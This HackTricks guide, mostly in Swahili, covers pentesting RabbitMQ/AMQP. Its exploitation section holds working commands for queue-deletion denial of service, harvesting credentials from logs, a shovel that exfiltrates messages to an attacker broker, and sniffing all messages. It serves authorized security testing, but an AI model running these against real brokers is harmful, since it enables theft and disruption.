5671,5672 - Pentesting AMQP

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

From cloudamqp:

RabbitMQ ni programu ya foleni za ujumbe inayojulikana pia kama mwakala wa ujumbe au meneja wa foleni. Kwa kifupi; ni programu ambapo foleni zinafafanuliwa, ambazo programu zinaunganishwa ili kuhamisha ujumbe au ujumbe nyingi.
Ujumbe unaweza kujumuisha aina yoyote ya taarifa. Inaweza, kwa mfano, kuwa na taarifa kuhusu mchakato au kazi inayotakiwa kuanzishwa kwenye programu nyingine (ambayo inaweza hata kuwa kwenye seva nyingine), au inaweza kuwa ujumbe wa maandishi rahisi. Programu ya meneja wa foleni huhifadhi ujumbe hadi programu inayopokea iunge na ichukue ujumbe kutoka kwenye foleni. Programu inayopokea kisha inasindika ujumbe.
Definition from .

Bandari chaguo-msingi: 5672,5671

PORT     STATE SERVICE VERSION
5672/tcp open  amqp    RabbitMQ 3.1.5 (0-9)

• Vyeti vya chaguo-msingi: guest:guest. RabbitMQ huwadhibiti kwa localhost kupitia loopback_users, lakini imaji nyingi za Docker/IoT zimezimwa ukaguzi huo, hivyo kila mara jaribu kuingia kwa mbali kabla ya kudhani imezuiwa.
• Mekanizimu za uthibitishaji: PLAIN na AMQPLAIN zimewezeshwa kwa chaguo-msingi, ANONYMOUS inaratibiwa na anonymous_login_user/anonymous_login_pass, na EXTERNAL (x509) inaweza kuonekana wakati TLS imewezeshwa. Orodhesha kile broker anatangaza ili ujue kama utajaribu password spraying au certificate impersonation baadaye.

Uorodheshaji

Kwa Mkono

import amqp
# By default it uses "guest":"guest"
conn = amqp.connection.Connection(host="IP", port=5672, virtual_host="/")
conn.connect()
print("SASL mechanisms:", conn.mechanisms)
for k, v in conn.server_properties.items():
print(k, v)

Mara tu umeidhinishwa, toa conn.server_properties, conn.channel_max na conn.frame_max ili kuelewa vizingiti vya throughput na ikiwa unaweza kuchosha rasilimali kwa fremu zilizozidi ukubwa.

Kiotomatiki

nmap -sV -Pn -n -T4 -p 5672 --script amqp-info IP

PORT     STATE SERVICE VERSION
5672/tcp open  amqp    RabbitMQ 3.1.5 (0-9)
| amqp-info:
|   capabilities:
|     publisher_confirms: YES
|     exchange_exchange_bindings: YES
|     basic.nack: YES
|     consumer_cancel_notify: YES
|   copyright: Copyright (C) 2007-2013 GoPivotal, Inc.
|   information: Licensed under the MPL.  See http://www.rabbitmq.com/
|   platform: Erlang/OTP
|   product: RabbitMQ
|   version: 3.1.5
|   mechanisms: PLAIN AMQPLAIN
|_  locales: en_US

Ukaguzi wa TLS/SASL

• Probe AMQPS:

openssl s_client -alpn amqp -connect IP:5671 -tls1_3 -msg </dev/null

This leaks mnyororo wa vyeti, matoleo ya TLS yanayoungwa mkono na kama mutual TLS inahitajika.

• List listeners without creds:

rabbitmq-diagnostics -q listeners

Inafaa mara utakapo pata low-priv shell access kwenye host.

• Spot ANONYMOUS logins: ikiwa broker inaruhusu ANONYMOUS SASL mechanism, jaribu kuungana kwa username/password tupu; RabbitMQ kwa ndani itakuweka kwenye anonymous_login_user (defaults to guest).

Brute Force

• AMQP Protocol Brute-Force
• STOMP Protocol Brute-Force

Exploitation Tips

Queue deletion without configure perms (CVE-2024-51988)

RabbitMQ ≤ 3.12.10 (and unpatched Tanzu builds) inashindwa kukagua ruhusa ya configure wakati queues zinafutwa kupitia HTTP API. Mtumiaji yoyote authenticated mwenye access kwa vhost lengwa anaweza nuke queues yoyote hata kama ana haki za read au write pekee.

# confirm vulnerable version first
rabbitmqadmin -H target -P 15672 -u user -p pass show overview | grep -i version
# delete a high-value queue
curl -k -u user:pass -X DELETE https://target:15672/api/queues/%2F/payments-processing

Changanya hili na rabbitmqadmin list permissions ili kutambua vhosts ambapo mtumiaji wako mwenye low-priv ana upatikanaji wa sehemu; kisha wipe queues ili kusababisha denial of service au kuamsha compensating controls zinazotazamwa upande wa AMQP. Angalia 15672 pentesting kwa HTTP API endpoints zaidi za kuunganisha na bug hii.

Kusanya nyaraka za kuingia kutoka kwenye logi za RabbitMQ (CVE-2025-50200)

Hadi 4.0.8/4.1.0, kupiga management API kwa HTTP basic auth kwenye rasilimali isiyo yawepo husababisha broker kuandika yote Authorization header (base64) kwenye logi. Ikiwa unapata ufikiaji mdogo wa filesystem (mfano Docker escape, plugin RCE), tafuta /var/log/rabbitmq/rabbit@*.log kwa Authorization: na kupata nyaraka za kuingia za tenants wengine au service accounts.

curl -k -u pentester:SuperSecret https://target:15672/api/queues/%2f/ghost
sudo grep -R "Authorization:" /var/log/rabbitmq | cut -d' ' -f3 | base64 -d

Sababisha hili kwa makusudi kwa bogus endpoints ili kuweka siri mpya kwenye logs, kisha pivot kwa kutumia tena decoded creds kupitia AMQP, STOMP, MQTT au OS yenyewe.

Tumia rabbitmqadmin-ng

rabbitmqadmin v2 (aka rabbitmqadmin-ng) ni CLI yenye kujitegemea inayozungumza na management API na sasa inakuja na statically linked builds kwa Linux/macOS/Windows. Weka kwenye bounce box yako na uandae script:

# enumerate live channels and prefetch pressure
rabbitmqadmin --host target --port 15672 --username user --password pass channels list --non-interactive
# clone a shovel to exfiltrate messages to attacker-controlled broker
rabbitmqadmin shovels declare_amqp091 \
--name loot \
--source-uri amqp://user:pass@target:5672/%2f \
--destination-uri amqp://attacker:pw@vps:5672/%2f \
--source-queue transactions \
--destination-queue stolen

Kwa sababu zana inasaidia ukaguzi wa afya unaotambua blue/green, unaweza pia kutumia mbaya rabbitmqadmin health_check port_listener --port 5672 kuthibitisha kwa mbali ikiwa TLS listeners zilifunuliwa au kuifanya huduma iwe na mzigo kwa ajili ya timing probes.

Message hijacking/sniffing

Iwapo utapata sera zinazoruhusu (.* bindings, topic exchanges, au x-queue-master-locator = min-masters), unaweza kimya kimya kunyakua ujumbe bila kuzifuta:

import pika
creds = pika.PlainCredentials('user','pass')
conn = pika.BlockingConnection(pika.ConnectionParameters('IP', 5672, '/', creds))
ch = conn.channel()
ch.queue_declare(queue='loot', exclusive=True, auto_delete=True)
ch.queue_bind(queue='loot', exchange='amq.topic', routing_key='#')
for method, props, body in ch.consume('loot', inactivity_timeout=5):
if body:
print(method.routing_key, body)

Badilisha routing key kwa audit.# au payments.* ili kuzingatia mifereji nyeti, kisha chapisha tena ujumbe bandia kwa kubadili hoja za basic_publish—handy kwa replay attacks dhidi ya microservices za downstream.

Other RabbitMQ ports

Katika https://www.rabbitmq.com/networking.html unaweza kuona kwamba RabbitMQ inatumia bandari kadhaa:

• 1883, 8883: (MQTT clients bila na kwa TLS, ikiwa MQTT plugin imewezeshwa. Learn more about how to pentest MQTT here.
• 4369: epmd, huduma ya kugundua peers inayotumiwa na nodes za RabbitMQ na zana za CLI. Learn more about how to pentest this service here.
• 5672, 5671: zinatumika na AMQP 0-9-1 na 1.0 clients bila na kwa TLS
• 15672: HTTP API clients, management UI na rabbitmqadmin (tu ikiwa management plugin imewezeshwa). Learn more about how to pentest this service here.
• 15674: STOMP-over-WebSockets clients (tu ikiwa Web STOMP plugin imewezeshwa)
• 15675: MQTT-over-WebSockets clients (tu ikiwa Web MQTT plugin imewezeshwa)
• 15692: Prometheus metrics (tu ikiwa Prometheus plugin imewezeshwa)
• 25672: inatumiwa kwa mawasiliano kati ya nodes na zana za CLI (Erlang distribution server port) na inatolewa kutoka kwa safu ya dynamic (inapunguzwa kwa port moja kwa default, inahesabiwa kama AMQP port + 20000). Isipokuwa muunganisho wa nje kwenye bandari hizi ni muhimu sana (mfano cluster inatumia federation au zana za CLI zinatumiwa kwenye mashine nje ya subnet), bandari hizi hazipaswi kufunguliwa hadharani. Tazama networking guide kwa maelezo. Ni 9 tu ya bandari hizi zilizo wazi kwenye intaneti.
• 35672-35682: zinatumika na zana za CLI (Erlang distribution client ports) kwa mawasiliano na nodes na zinatolewa kutoka kwa safu ya dynamic (inahesabiwa kama server distribution port + 10000 hadi server distribution port + 10010). Tazama networking guide kwa maelezo.
• 61613, 61614: STOMP clients bila na kwa TLS (tu ikiwa STOMP plugin imewezeshwa). Vifaa chini ya 10 vina bandari hii wazi na kwa kawaida hutumika kwa UDP kwa nodes za DHT.

See also

4222 Pentesting Nats

Shodan

• AMQP

Marejeo

• CloudAMQP – RabbitMQ for beginners
• RabbitMQ Networking Guide
• RabbitMQ Authentication, Authorisation & Access Control
• CVE-2024-51988 – RabbitMQ HTTP API queue deletion bug
• GHSA-gh3x-4x42-fvq8 – RabbitMQ logs Authorization header
• rabbitmqadmin v2 (rabbitmqadmin-ng)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.